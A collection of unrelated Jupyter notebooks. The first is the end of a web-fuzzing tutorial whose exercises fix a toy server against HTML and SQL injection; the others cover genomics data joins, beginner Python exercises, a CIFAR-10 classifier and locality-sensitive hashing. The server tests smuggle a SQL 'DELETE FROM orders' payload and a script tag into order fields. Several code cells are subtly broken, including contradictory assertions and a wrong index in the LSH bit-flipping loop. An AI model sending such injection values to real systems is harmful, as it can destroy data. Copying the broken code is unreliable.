from Fuzzer import Fuzzer, Runner
from Grammars import Grammar, Expansion
from GrammarFuzzer import GrammarFuzzer, DerivationTree
# ignore
display_class_hierarchy([WebFormFuzzer, SQLInjectionFuzzer, WebRunner,
HTMLGrammarMiner, SQLInjectionGrammarMiner],
public_methods=[
Fuzzer.__init__,
Fuzzer.fuzz,
Fuzzer.run,
Fuzzer.runs,
Runner.__init__,
Runner.run,
WebRunner.__init__,
WebRunner.run,
GrammarFuzzer.__init__,
GrammarFuzzer.fuzz,
GrammarFuzzer.fuzz_tree,
WebFormFuzzer.__init__,
SQLInjectionFuzzer.__init__,
HTMLGrammarMiner.__init__,
SQLInjectionGrammarMiner.__init__,
],
types={
'DerivationTree': DerivationTree,
'Expansion': Expansion,
'Grammar': Grammar
},
project='fuzzingbook')
```
## Lessons Learned
* User Interfaces (in the Web and elsewhere) should be tested with _expected_ and _unexpected_ values.
* One can _mine grammars from user interfaces_, allowing for their widespread testing.
* Consequent _sanitizing_ of inputs prevents common attacks such as code and SQL injection.
* Do not attempt to write a Web server yourself, as you are likely to repeat all the mistakes of others.
We're done, so we can clean up:
```
clear_httpd_messages()
httpd_process.terminate()
```
## Next Steps
From here, the next step is [GUI Fuzzing](GUIFuzzer.ipynb), going from HTML- and Web-based user interfaces to generic user interfaces (including JavaScript and mobile user interfaces).
If you are interested in security testing, do not miss our [chapter on information flow](InformationFlow.ipynb), showing how to systematically detect information leaks; this also addresses the issue of SQL Injection attacks.
## Background
The [Wikipedia pages on Web application security](https://en.wikipedia.org/wiki/Web_application_security) are a mandatory read for anyone building, maintaining, or testing Web applications. In 2012, cross-site scripting and SQL injection, as discussed in this chapter, made up more than 50% of Web application vulnerabilities.
The [Wikipedia page on penetration testing](https://en.wikipedia.org/wiki/Penetration_test) provides a comprehensive overview on the history of penetration testing, as well as collections of vulnerabilities.
The [OWASP Zed Attack Proxy Project](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) (ZAP) is an open source Web site security scanner including several of the features discussed above, and many many more.
## Exercises
### Exercise 1: Fix the Server
Create a `BetterHTTPRequestHandler` class that fixes the several issues of `SimpleHTTPRequestHandler`:
#### Part 1: Silent Failures
Set up the server such that it does not reveal internal information – in particular, tracebacks and HTTP status codes.
**Solution.** We define a better message that does not reveal tracebacks:
```
BETTER_HTML_INTERNAL_SERVER_ERROR = \
HTML_INTERNAL_SERVER_ERROR.replace("<pre>{error_message}</pre>", "")
HTML(BETTER_HTML_INTERNAL_SERVER_ERROR)
```
We have the `internal_server_error()` message return `HTTPStatus.OK` to make it harder for machines to find out something went wrong:
```
class BetterHTTPRequestHandler(SimpleHTTPRequestHandler):
def internal_server_error(self):
# Note: No INTERNAL_SERVER_ERROR status
self.send_response(HTTPStatus.OK, "Internal Error")
self.send_header("Content-type", "text/html")
self.end_headers()
exc = traceback.format_exc()
self.log_message("%s", exc.strip())
# No traceback or other information
message = BETTER_HTML_INTERNAL_SERVER_ERROR
self.wfile.write(message.encode("utf8"))
```
#### Part 2: Sanitized HTML
Set up the server such that it is not vulnerable against HTML and JavaScript injection attacks, notably by using methods such as `html.escape()` to escape special characters when showing them.
```
import html
```
**Solution.** We pass all values read through `html.escape()` before showing them on the screen; this will properly encode `<`, `&`, and `>` characters.
```
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
def send_order_received(self, values):
sanitized_values = {}
for field in values:
sanitized_values[field] = html.escape(values[field])
sanitized_values["item_name"] = html.escape(
FUZZINGBOOK_SWAG[values["item"]])
confirmation = HTML_ORDER_RECEIVED.format(
**sanitized_values).encode("utf8")
self.send_response(HTTPStatus.OK, "Order received")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(confirmation)
```
#### Part 3: Sanitized SQL
Set up the server such that it is not vulnerable against SQL injection attacks, notably by using _SQL parameter substitution._
**Solution.** We use SQL parameter substitution to avoid interpretation of inputs as SQL commands. Also, we use `execute()` rather than `executescript()` to avoid processing of multiple commands.
```
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
def store_order(self, values):
db = sqlite3.connect(ORDERS_DB)
db.execute("INSERT INTO orders VALUES (?, ?, ?, ?, ?)",
(values['item'], values['name'], values['email'], values['city'], values['zip']))
db.commit()
```
One could also argue not to save "dangerous" characters in the first place. But then, there might always be names or addresses with special characters which all need to be handled.
#### Part 4: A Robust Server
Set up the server such that it does not crash with invalid or missing fields.
**Solution.** We set up a simple check at the beginning of `handle_order()` that checks whether all required fields are present. If not, we return to the order form.
```
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
REQUIRED_FIELDS = ['item', 'name', 'email', 'city', 'zip']
def handle_order(self):
values = self.get_field_values()
for required_field in self.REQUIRED_FIELDS:
if required_field not in values:
self.send_order_form()
return
self.store_order(values)
self.send_order_received(values)
```
This could easily be extended to check for valid (at least non-empty) values. Also, the order form should be pre-filled with the originally submitted values, and come with a helpful error message.
#### Part 5: Test it!
Test your improved server whether your measures have been successful.
**Solution.** Here we go:
```
httpd_process, httpd_url = start_httpd(BetterHTTPRequestHandler)
print_url(httpd_url)
print_httpd_messages()
```
We test standard behavior:
```
standard_order = "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"
contents = webbrowser(httpd_url + standard_order)
HTML(contents)
assert contents.find("Thank you") > 0
```
We test for incomplete URLs:
```
bad_order = "/order?item="
contents = webbrowser(httpd_url + bad_order)
HTML(contents)
assert contents.find("Order Form") > 0
```
We test for HTML (and JavaScript) injection:
```
injection_order = "/order?item=tshirt&name=Jane+Doe" + cgi_encode("<script></script>") + \
"&email=doe%40example.com&city=Seattle&zip=98104"
contents = webbrowser(httpd_url + injection_order)
HTML(contents)
assert contents.find("Thank you") > 0
assert contents.find("<script>") < 0
assert contents.find("<script>") > 0
```
We test for SQL injection:
```
sql_order = "/order?item=tshirt&name=" + \
cgi_encode("Robert', 'x', 'x', 'x'); DELETE FROM orders; --") + \
"&email=doe%40example.com&city=Seattle&zip=98104"
contents = webbrowser(httpd_url + sql_order)
HTML(contents)
```
(Okay, so obviously we can now handle the weirdest of names; still, Robert should consider changing his name...)
```
assert contents.find("DELETE FROM") > 0
assert not orders_db_is_empty()
```
That's it – we're done!
```
httpd_process.terminate()
if os.path.exists(ORDERS_DB):
os.remove(ORDERS_DB)
```
### Exercise 2: Protect the Server
Assume that it is not possible for you to alter the server code. Create a _filter_ that is run on all URLs before they are passed to the server.
#### Part 1: A Blacklisting Filter
Set up a filter function `blacklist(url)` that returns `False` for URLs that should not reach the server. Check the URL for whether it contains HTML, JavaScript, or SQL fragments.
#### Part 2: A Whitelisting Filter
Set up a filter function `whitelist(url)` that returns `True` for URLs that are allowed to reach the server. Check the URL for whether it conforms to expectations; use a [parser](Parser.ipynb) and a dedicated grammar for this purpose.
**Solution.** Left to the reader.
### Exercise 3: Input Patterns
To fill out forms, fuzzers could be much smarter in how they generate input values. Starting with HTML 5, input fields can have a `pattern` attribute defining a _regular expression_ that an input value has to satisfy. A 5-digit ZIP code, for instance, could be defined by the pattern
```html
<input type="text" pattern="[0-9][0-9][0-9][0-9][0-9]">
```
Extract such patterns from the HTML page and convert them into equivalent grammar production rules, ensuring that only inputs satisfying the patterns are produced.
**Solution.** Left to the reader at this point.
### Exercise 4: Coverage-Driven Web Fuzzing
Combine the above fuzzers with [coverage-driven](GrammarCoverageFuzzer.ipynb) and [search-based](SearchBasedFuzzer.ipynb) approaches to maximize feature and code coverage.
**Solution.** Left to the reader at this point.
|
github_jupyter
|
## Ensembl to RefSeq Mapping
The constraint table from gnomAD has duplicate gene ID's - in the example of TUBB3 one gene ID is missannotated. Given out analysis is by transcript, it is probably better to use the transcript table from gnomAD. Howver, gnomAD used ENSEMBL transcripts and we used RefSeq Transcripts. Can map the two through biomart:
http://www.ensembl.org/biomart/martview/e81bf786e69482239d8e7799ec2c9e9e
```
import org.apache.spark.sql.{Row, SparkSession}
import org.apache.spark.sql.types._
import org.apache.spark.sql.functions._
import org.apache.spark.sql.expressions.Window
val customSchema = new StructType(Array(
StructField("GeneID",StringType,true),
StructField("GeneIDVer",StringType,true),
StructField("TranscriptID",StringType,true),
StructField("TranscriptIDVer",StringType,true),
StructField("EnsemblGeneSymbol",StringType,true),
StructField("GeneType",StringType,true),
StructField("GENE",StringType,true),
StructField("RefSeq",StringType,true),
StructField("NCBIGeneID",IntegerType,true)))
val df_ens2ref = (spark.read
.format("csv")
.option("header", "true")
.option("delimiter", "\t")
.option("nullValues", "")
.schema(customSchema)
.load("s3://nch-igm-research-projects/rna_stability/peter/ensembl_2_refeq.txt")
)
df_ens2ref.printSchema
df_ens2ref.filter($"GENE" === "TUBB3").show
```
Double check there are no duplicates
```
val df_ref2ens = df_ens2ref.filter($"RefSeq".isNotNull).select("TranscriptID","RefSeq").sort($"TranscriptID").distinct
df_ref2ens.show
df_ref2ens.count
df_ref2ens.select($"RefSeq").distinct.count
df_ref2ens.groupBy($"RefSeq").count.sort($"count".desc).show
```
## gnomAD lof metrics by transcript
We want to link the data to gnomAD constraint metrics (LOEUF and pLI):
Supplemental Table describing data fields:
https://static-content.springer.com/esm/art%3A10.1038%2Fs41586-020-2308-7/MediaObjects/41586_2020_2308_MOESM1_ESM.pdf
Select the following columns from the main file:
* **gene**: Gene name
* **gene_id**: Ensembl gene ID
* **transcript**: Ensembl transcript ID (Gencode v19)
* **obs_mis**: Number of observed missense variants in transcript
* **exp_mis**: Number of expected missense variants in transcript
* **oe_mis**: Observed over expected ratio for missense variants in transcript (obs_mis divided by exp_mis)
* **obs_syn**: Number of observed synonymous variants in transcript
* **exp_syn**: Number of expected synonymous variants in transcript
* **oe_syn**: Observed over expected ratio for missense variants in transcript (obs_syn divided by exp_syn)
* **p**: The estimated proportion of haplotypes with a pLoF variant. Defined as: 1 -sqrt(no_lofs / defined)
* **pLI**: Probability of loss-of-function intolerance; probability that transcript falls into distribution of haploinsufficient genes (~9% o/e pLoF ratio; computed from gnomAD data)
* **pRec**: Probability that transcript falls into distribution of recessive genes (~46% o/e pLoF ratio; computed from gnomAD data)
* **pNull**: Probability that transcript falls into distribution of unconstrained genes (~100% o/epLoF ratio; computed from gnomAD data)
* **oe_lof_upper**: LOEUF: upper bound of 90% confidence interval for o/e ratio for pLoF variants (lower values indicate more constrained)
* **oe_lof_upper_rank**: Transcript’s rank of LOEUF value compared to all transcripts (lower values indicate more constrained)
* **oe_lof_upper_bin**: Decile bin of LOEUF for given transcript (lower values indicate more constrained)
```
val cols_constraint = Seq("gene","gene_id","transcript","obs_mis","exp_mis","oe_mis","obs_syn","exp_syn","oe_syn",
"p","pLI","pRec","pNull","oe_lof_upper","oe_lof_upper_rank","oe_lof_upper_bin")
val df_loft_import = (spark.read
.format("csv")
.option("header", "true")
.option("delimiter", "\t")
.option("inferSchema", "true")
.option("nullValues", "NA")
.option("nanValue=", "NA")
.load("s3://nch-igm-research-projects/rna_stability/peter/gnomad.v2.1.1.lof_metrics.by_transcript.txt")
.select(cols_constraint.map(col): _*)
)
val df_loft = (df_loft_import.withColumn("p",col("p").cast(DoubleType))
.withColumn("pLI",col("pLI").cast(DoubleType))
.withColumn("pRec",col("pRec").cast(DoubleType))
.withColumn("pNull",col("pNull").cast(DoubleType))
.withColumn("oe_lof_upper",col("oe_lof_upper").cast(DoubleType))
.withColumn("oe_lof_upper_rank",col("oe_lof_upper_rank").cast(IntegerType))
.withColumn("oe_lof_upper_bin",col("oe_lof_upper_bin").cast(IntegerType))
.withColumnRenamed("gene", "gnomadGeneSymbol")
.withColumnRenamed("gene_id", "gnomadGeneID")
.withColumnRenamed("transcript", "TranscriptID")
)
df_loft.printSchema
df_loft.filter($"gene" === "TUBB3").show
```
Lets check that TranscriptID is not duplicated
```
df_loft.select($"TranscriptID").distinct.count
df_loft.count
df_loft.filter($"p".isNotNull && $"pLI" < 0.9).
select("gnomadGeneSymbol","p","pLI","oe_lof_upper","oe_lof_upper_rank","oe_lof_upper_bin").sort($"pLI".desc).show
```
## Join gnomAD lof table to RefSeq to Ensembl table
```
val df_loft_ref = (df_loft.as("df_loft")
.join(df_ref2ens.as("df_ref2ens"), $"df_loft.TranscriptID" === $"df_ref2ens.TranscriptID", "inner")
.drop($"df_ref2ens.TranscriptID"))
```
Note that the number of rows has now increased from 80,950 to 95,806 - this is becuase ensemble transcripts can map to multiple RefSeq transcripts and vice versa. We now need to make a table where the RefSeq field is not duplicated.
```
df_loft_ref.groupBy($"RefSeq").count.sort($"count".desc).show
```
For duplicate RefSeq's we will choose the value with the highest pLI value (i.e. most contrained) and where pLI is the same lowest oef rank (i.e. most constrained).
```
df_loft_ref.filter($"RefSeq" === "NM_206955" || $"RefSeq" === "NM_145021").show
val df_high_pLI = df_loft_ref.groupBy($"RefSeq").agg(max($"pLI"), min($"oe_lof_upper_rank"))
df_high_pLI.filter($"RefSeq" === "NM_206955" || $"RefSeq" === "NM_145021").show
```
Finally, create a table with unique RefSeq by joining to high pLI table
```
val df_loft_ref_uniq = ( df_loft_ref.join(df_high_pLI.as("pli"),
df_loft_ref("RefSeq") === df_high_pLI("RefSeq") &&
df_loft_ref("pLI") === df_high_pLI("max(pLI)") &&
df_loft_ref("oe_lof_upper_rank") === df_high_pLI("min(oe_lof_upper_rank)"),
"inner")
.drop($"pli.RefSeq").drop($"pli.max(pLI)").drop($"pli.min(oe_lof_upper_rank)") )
df_loft_ref_uniq.groupBy($"RefSeq").count.sort($"count".desc).show
df_loft_ref_uniq.orderBy(rand()).limit(10).show
```
Constrained genes are those with a pLi > 0.9
```
df_loft_ref_uniq.filter($"pLi" >= 0.9).groupBy($"oe_lof_upper_bin").count.sort($"count".desc).show
```
Probability that transcript falls into distribution of unconstrained genes
```
df_loft_ref_uniq.filter($"pNull" <= 0.05).groupBy($"oe_lof_upper_bin").count.sort($"count".desc).show
df_loft_ref_uniq.filter($"pNull" > 0.05).groupBy($"oe_lof_upper_bin").count.sort($"count".desc).show
```
Probability that transcript falls into distribution of recessive genes (~46% o/e pLoF ratio; computed from gnomAD data)
```
df_loft_ref_uniq.filter($"pRec" <= 0.05).groupBy($"oe_lof_upper_bin").count.sort($"count".desc).show
df_loft_ref_uniq.filter($"pRec" > 0.05).groupBy($"oe_lof_upper_bin").count.sort($"count".desc).show
```
### Write out gnomAD pLI with RefSeq Metrics
```
(df_loft_ref_uniq.write.mode("overwrite")
.parquet("s3://nch-igm-research-projects/rna_stability/peter/gnomAD_pLI_RefSeq.parquet"))
```
|
github_jupyter
|
练习 1:求n个随机整数均值的平方根,整数范围在m与k之间。
```
import random, math
def test():
i = 0
total = 0
average = 0
number = random.randint(m, k)
while i < n:
i += 1
total += number
number = random.randint(m, k)
print('随机数是:', number)
average = int(total/n)
return math.sqrt(average)
#主程序
m=int(input('请输入一个整数下限:'))
k=int(input('请输入一个整数上限:'))
n=int(input('随机整数的个数是:'))
test()
```
练习 2:写函数,共n个随机整数,整数范围在m与k之间,(n,m,k由用户输入)。求1:西格玛log(随机整数),2:西格玛1/log(随机整数)
```
import random, math
def test1():
i = 0
total = 0
number = random.randint(m,k)
result = math.log10(number)
while i < n:
i += 1
number = random.randint(m,k)
print('执行1的随机整数是:', number)
result += math.log10(number)
return result
def test2():
i = 0
total = 0
number = random.randint(m,k)
result = 1/(math.log10(number))
while i < n:
i += 1
number = random.randint(m,k)
print('执行2的随机整数是:', number)
result += 1/(math.log10(number))
return result
#主程序
n = int(input('随机整数的个数是:'))
m = int(input('请输入一个整数下限:'))
k = int(input('请输入一个整数上限:'))
print()
print('执行1的结果是:', test1())
print()
print('执行2的结果是:', test2())
```
练习 3:写函数,求s=a+aa+aaa+aaaa+aa...a的值,其中a是[1,9]之间的随机整数。例如2+22+222+2222+22222(此时共有5个数相加),几个数相加由键盘输入。
```
import random
def test():
a = random.randint(1,9)
print('随机整数a是:', a)
i = 0
s = 0
number = 0
total = 0
while i < n:
s = 10**i
number += a * s
total += number
i += 1
return total
#主程序
n = int(input('需要相加的个数是:'))
print('结果是:', test())
```
挑战性练习:仿照task5,将猜数游戏改成由用户随便选择一个整数,让计算机来猜测的猜数游戏,要求和task5中人猜测的方法类似,但是人机角色对换,由人来判断猜测是大、小还是相等,请写出完整的猜数游戏。
```
import random, math
def win():
print(
'''
======YOU WIN=======
."". ."",
| | / /
| | / /
| | / /
| |/ ;-._
} ` _/ / ;
| /` ) / /
| / /_/\_/\
|/ / |
( ' \ '- |
\ `. /
| |
| |
======YOU WIN=======
'''
)
def lose():
print(
'''
======YOU LOSE=======
.-" "-.
/ \
| |
|, .-. .-. ,|
| )(__/ \__)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \_______\__|IIIIII|__/__________________________
(_)@8@8{}<________|-\IIIIII/-|___________________________>
)_/ \ /
(@ `--------`
======YOU LOSE=======
'''
)
def game_over():
print(
'''
======GAME OVER=======
_________
/ ======= \
/ __________\
| ___________ |
| | - | |
| | | |
| |_________| |________________
\=____________/ )
/ """"""""""" \ /
/ ::::::::::::: \ =D-'
(_________________)
======GAME OVER=======
'''
)
def show_team():
print('''
***声明***
本游戏由PXS小机智开发''')
def show_instruction():
print('''
游戏说明
玩家选择一个任意整数,计算机来猜测该数。
若计算机在规定次数内猜中该数,则计算机获胜。
若规定次数内没有猜中,则玩家获胜。''')
def menu():
print('''
=====游戏菜单=====
1. 游戏说明
2. 开始游戏
3. 退出游戏
4. 制作团队
=====游戏菜单=====''')
def guess_game():
n = int(input('请输入一个大于0的整数,作为神秘整数的上界,回车结束。'))
max_times = int(math.log(n,2))
print('规定猜测次数是:', max_times, '次')
print()
guess = random.randint(1, n)
print('我猜这个数是:', guess)
guess_times = 1
max_number = n
min_number = 1
while guess_times < max_times:
answer = input('我猜对了吗?(请输入“对”或“不对”)')
if answer == '对':
print(lose())
break
if answer == '不对':
x = input('我猜大了还是小了?(请输入“大”或“小”)')
print()
if x == '大':
max_number = guess-1
guess = random.randint(min_number,max_number)
print('我猜这个数是:', guess)
guess_times += 1
print('我已经猜了', guess_times, '次')
print()
if guess_times == max_times:
ask = input('''***猜测已达规定次数***
我猜对了吗?(请输入“对”或“不对”)''')
if ask == '不对':
end()
break
else:
lose()
if x == '小':
min_number = guess + 1
guess = random.randint(min_number,max_number)
print('我猜这个数是:', guess)
guess_times += 1
print('我已经猜了', guess_times, '次')
print()
if guess_times == max_times:
ask = input('''***猜测已达规定次数***
我猜对了吗?(请输入“对”或“不对”)''')
if ask == '不对':
end()
break
else:
lose()
def end():
a = input('你的神秘数字是:')
print()
print('原来是', a, '啊!')
win()
#主函数
def main():
while True:
menu()
choice = int(input('请输入你的选择'))
if choice == 1:
show_instruction()
elif choice == 2:
guess_game()
elif choice == 3:
game_over()
break
else:
show_team()
#主程序
if __name__ == '__main__':
main()
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/parthsaxena1909/Image-Classifer-using-CIFRA10/blob/master/CNN_Keras_imageClassfier.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
import tensorflow as tf
import os
import numpy as np
from matplotlib import pyplot as plt
%matplotlib inline
if not os.path.isdir('models'):
os.mkdir('models')
print('Tensorflow Version:', tf.__version__)
print('is using GPU?', tf.test.is_gpu_available())
def get_three_classess(x,y):
indices_0, _ = np.where(y==0.)
indices_1, _ = np.where(y==1.)
indices_2, _ = np.where(y==2.)
indices = np.concatenate([indices_0, indices_1, indices_2], axis = 0)
x = x[indices]
y = y[indices]
count = x.shape[0]
indices = np.random.choice(range(count), count , replace = False )
x = x[indices]
y= y[indices]
y = tf.keras.utils.to_categorical(y)
return x,y
(x_train,y_train),(x_test,y_test) = tf.keras.datasets.cifar10.load_data()
x_train,y_train = get_three_classess(x_train,y_train)
x_test, y_test = get_three_classess(x_test,y_test)
print(x_train.shape,y_train.shape)
print(x_test.shape,y_test.shape)
class_names = ['aeroplane','car','bird']
def show_random_examples(x,y,p):
indices = np.random.choice(range(x.shape[0]), 10, replace = False)
x=x[indices]
y=y[indices]
p=p[indices]
plt.figure(figsize = (10,5))
for i in range(10):
plt.subplot(2,5,1+i)
plt.imshow(x[i])
plt.xticks([])
plt.yticks([])
col = 'green' if np.argmax(y[i]) == np.argmax(p[i]) else 'red'
plt.xlabel(class_names[np.argmax(p[i])], color = col)
plt.show()
show_random_examples(x_train,y_train,y_train)
show_random_examples(x_test,y_test,y_test)
from tensorflow.keras.layers import Conv2D, MaxPooling2D, BatchNormalization
from tensorflow.keras.layers import Dropout, Flatten, Input,Dense
def create_model():
def add_conv_block(model, num_filters):
model.add(Conv2D(num_filters,3,activation='relu',padding='same'))
model.add(BatchNormalization())
model.add(Conv2D(num_filters,3,activation='relu',padding='valid'))
model.add(MaxPooling2D(pool_size= 2))
model.add(Dropout(0.5))
return model
model = tf.keras.models.Sequential()
model.add(Input(shape=(32,32,3)))
model = add_conv_block(model,32)
model= add_conv_block(model,64)
model = add_conv_block(model,128)
model.add(Flatten())
model.add(Dense(3,activation='softmax'))
model.compile(
loss = 'categorical_crossentropy',
optimizer= 'adam', metrics=['accuracy']
)
return model
model = create_model()
model.summary()
h = model.fit(
x_train/255.,y_train,
validation_data=(x_test/255.,y_test),
epochs=10, batch_size = 128,
callbacks=[
tf.keras.callbacks.EarlyStopping(monitor='val_accuracy',patience=3),
tf.keras.callbacks.ModelCheckpoint(
'models/model_{val_accuracy:.3f}.h5',
save_best_only=True, save_weights_only=False,
monitor = 'val_accuracy'
)
]
)
accs= h.history['accuracy']
val_accs= h.history['val_accuracy']
plt.plot(range(len(accs)),accs,label='Training')
plt.plot(range(len(accs)),val_accs,label='Validation')
plt.legend()
plt.show()
model=tf.keras.models.load_model('models/model_0.877.h5')
preds=model.predict(x_test/255.)
show_random_examples(x_test,y_test,preds)
```
|
github_jupyter
|
# Locality Sensitive Hashing
```
import numpy as np
import pandas as pd
from scipy.sparse import csr_matrix
from sklearn.metrics.pairwise import pairwise_distances
import time
from copy import copy
import matplotlib.pyplot as plt
%matplotlib inline
'''compute norm of a sparse vector
Thanks to: Jaiyam Sharma'''
def norm(x):
sum_sq=x.dot(x.T)
norm=np.sqrt(sum_sq)
return(norm)
```
## Load in the Wikipedia dataset
```
wiki = pd.read_csv('people_wiki.csv')
wiki.head()
```
## Extract TF-IDF matrix
```
def load_sparse_csr(filename):
loader = np.load(filename)
data = loader['data']
indices = loader['indices']
indptr = loader['indptr']
shape = loader['shape']
return csr_matrix((data, indices, indptr), shape)
corpus = load_sparse_csr('people_wiki_tf_idf.npz')
assert corpus.shape == (59071, 547979)
print('Check passed correctly!')
```
## Train an LSH model
```
def generate_random_vectors(num_vector, dim):
return np.random.randn(dim, num_vector)
# Generate 3 random vectors of dimension 5, arranged into a single 5 x 3 matrix.
np.random.seed(0) # set seed=0 for consistent results
generate_random_vectors(num_vector=3, dim=5)
# Generate 16 random vectors of dimension 547979
np.random.seed(0)
random_vectors = generate_random_vectors(num_vector=16, dim=547979)
random_vectors.shape
doc = corpus[0, :] # vector of tf-idf values for document 0
doc.dot(random_vectors[:, 0]) >= 0 # True if positive sign; False if negative sign
doc.dot(random_vectors[:, 1]) >= 0 # True if positive sign; False if negative sign
doc.dot(random_vectors) >= 0 # should return an array of 16 True/False bits
np.array(doc.dot(random_vectors) >= 0, dtype=int) # display index bits in 0/1's
corpus[0:2].dot(random_vectors) >= 0 # compute bit indices of first two documents
corpus.dot(random_vectors) >= 0 # compute bit indices of ALL documents
doc = corpus[0, :] # first document
index_bits = (doc.dot(random_vectors) >= 0)
powers_of_two = (1 << np.arange(15, -1, -1))
print(index_bits)
print(powers_of_two)
print(index_bits.dot(powers_of_two))
index_bits = corpus.dot(random_vectors) >= 0
index_bits.dot(powers_of_two)
def train_lsh(data, num_vector=16, seed=None):
dim = data.shape[1]
if seed is not None:
np.random.seed(seed)
random_vectors = generate_random_vectors(num_vector, dim)
powers_of_two = 1 << np.arange(num_vector-1, -1, -1)
table = {}
# Partition data points into bins
bin_index_bits = (data.dot(random_vectors) >= 0)
# Encode bin index bits into integers
bin_indices = bin_index_bits.dot(powers_of_two)
# Update `table` so that `table[i]` is the list of document ids with bin index equal to i.
for data_index, bin_index in enumerate(bin_indices):
if bin_index not in table:
# If no list yet exists for this bin, assign the bin an empty list.
table[bin_index] = list() # YOUR CODE HERE
# Fetch the list of document ids associated with the bin and add the document id to the end.
table[bin_index].append(data_index)# YOUR CODE HERE
model = {'data': data,
'bin_index_bits': bin_index_bits,
'bin_indices': bin_indices,
'table': table,
'random_vectors': random_vectors,
'num_vector': num_vector}
return model
model = train_lsh(corpus, num_vector=16, seed=143)
table = model['table']
if 0 in table and table[0] == [39583] and \
143 in table and table[143] == [19693, 28277, 29776, 30399]:
print('Passed!')
else:
print('Check your code.')
```
## Inspect bins
```
wiki[wiki['name'] == 'Barack Obama']
print(model['bin_indices'][35817])
wiki[wiki['name'] == 'Joe Biden']
print(np.array(model['bin_index_bits'][24478], dtype=int)) # list of 0/1's
print(model['bin_indices'][24478]) # integer format
sum(model['bin_index_bits'][24478] == model['bin_index_bits'][35817])
wiki[wiki['name']=='Wynn Normington Hugh-Jones']
print(np.array(model['bin_index_bits'][22745], dtype=int)) # list of 0/1's
print(model['bin_indices'][22745])# integer format
model['bin_index_bits'][35817] == model['bin_index_bits'][22745]
model['table'][model['bin_indices'][35817]]
doc_ids = list(model['table'][model['bin_indices'][35817]])
doc_ids.remove(35817) # display documents other than Obama
docs = wiki[wiki.index.isin(doc_ids)]
docs
def cosine_distance(x, y):
xy = x.dot(y.T)
dist = xy/(norm(x)*norm(y))
return 1-dist[0,0]
obama_tf_idf = corpus[35817,:]
biden_tf_idf = corpus[24478,:]
print('================= Cosine distance from Barack Obama')
print('Barack Obama - {0:24s}: {1:f}'.format('Joe Biden',
cosine_distance(obama_tf_idf, biden_tf_idf)))
for doc_id in doc_ids:
doc_tf_idf = corpus[doc_id,:]
print('Barack Obama - {0:24s}: {1:f}'.format(wiki.iloc[doc_id]['name'],
cosine_distance(obama_tf_idf, doc_tf_idf)))
```
## Query the LSH model
```
from itertools import combinations
num_vector = 16
search_radius = 3
for diff in combinations(range(num_vector), search_radius):
print(diff)
def search_nearby_bins(query_bin_bits, table, search_radius=2, initial_candidates=set()):
"""
For a given query vector and trained LSH model, return all candidate neighbors for
the query among all bins within the given search radius.
Example usage
-------------
>>> model = train_lsh(corpus, num_vector=16, seed=143)
>>> q = model['bin_index_bits'][0] # vector for the first document
>>> candidates = search_nearby_bins(q, model['table'])
"""
num_vector = len(query_bin_bits)
powers_of_two = 1 << np.arange(num_vector-1, -1, -1)
# Allow the user to provide an initial set of candidates.
candidate_set = deepcopy(initial_candidates)
for different_bits in combinations(range(num_vector), search_radius):
# Flip the bits (n_1,n_2,...,n_r) of the query bin to produce a new bit vector.
## Hint: you can iterate over a tuple like a list
alternate_bits = deepcopy(query_bin_bits)
for i in different_bits:
alternate_bits[i] = 1-alternate_bits[0] # YOUR CODE HERE
# Convert the new bit vector to an integer index
nearby_bin = alternate_bits.dot(powers_of_two)
# Fetch the list of documents belonging to the bin indexed by the new bit vector.
# Then add those documents to candidate_set
# Make sure that the bin exists in the table!
# Hint: update() method for sets lets you add an entire list to the set
if nearby_bin in table:
candidate_set.update(table[nearby_bin])# YOUR CODE HERE: Update candidate_set with the documents in this bin.
return candidate_set
obama_bin_index = model['bin_index_bits'][35817] # bin index of Barack Obama
candidate_set = search_nearby_bins(obama_bin_index, model['table'], search_radius=0)
if candidate_set == set([35817, 21426, 53937, 39426, 50261]):
print('Passed test')
else:
print('Check your code')
print('List of documents in the same bin as Obama: 35817, 21426, 53937, 39426, 50261')
candidate_set = search_nearby_bins(obama_bin_index, model['table'], search_radius=1, initial_candidates=candidate_set)
if candidate_set == set([39426, 38155, 38412, 28444, 9757, 41631, 39207, 59050, 47773, 53937, 21426, 34547,
23229, 55615, 39877, 27404, 33996, 21715, 50261, 21975, 33243, 58723, 35817, 45676,
19699, 2804, 20347]):
print('Passed test')
else:
print('Check your code')
def query(vec, model, k, max_search_radius):
data = model['data']
table = model['table']
random_vectors = model['random_vectors']
num_vector = random_vectors.shape[1]
# Compute bin index for the query vector, in bit representation.
bin_index_bits = (vec.dot(random_vectors) >= 0).flatten()
# Search nearby bins and collect candidates
candidate_set = set()
for search_radius in range(max_search_radius+1):
candidate_set = search_nearby_bins(bin_index_bits, table, search_radius, initial_candidates=candidate_set)
# Sort candidates by their true distances from the query
nearest_neighbors = pd.DataFrame({'id':list(candidate_set)})
candidates = data[np.array(list(candidate_set)),:]
nearest_neighbors['distance'] = pairwise_distances(candidates, vec, metric='cosine').flatten()
return nearest_neighbors.nsmallest(k,'distance',)[['id','distance']], len(candidate_set)
query(corpus[35817,:], model, k=10, max_search_radius=3)
query(corpus[35817,:], model, k=10, max_search_radius=3)[0].set_index('id').join(wiki[['name']], how='inner').sort_values('distance')
```
|
github_jupyter
|
# Classification
```
from nltk.corpus import reuters
import spacy
import re
import numpy as np
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.svm import LinearSVC
from sklearn.multiclass import OneVsRestClassifier
from sklearn.metrics import f1_score, precision_score, recall_score
nlp = spacy.load("en_core_web_md")
def tokenize(text):
min_length = 3
tokens = [word.lemma_ for word in nlp(text) if not word.is_stop]
p = re.compile('[a-zA-Z]+');
filtered_tokens = list(filter (lambda token: p.match(token) and len(token) >= min_length,tokens))
return filtered_tokens
def represent_tfidf(train_docs, test_docs):
representer = TfidfVectorizer(tokenizer=tokenize)
# Learn and transform train documents
vectorised_train_documents = representer.fit_transform(train_docs)
vectorised_test_documents = representer.transform(test_docs)
return vectorised_train_documents, vectorised_test_documents
def doc2vec(text):
min_length = 3
p = re.compile('[a-zA-Z]+')
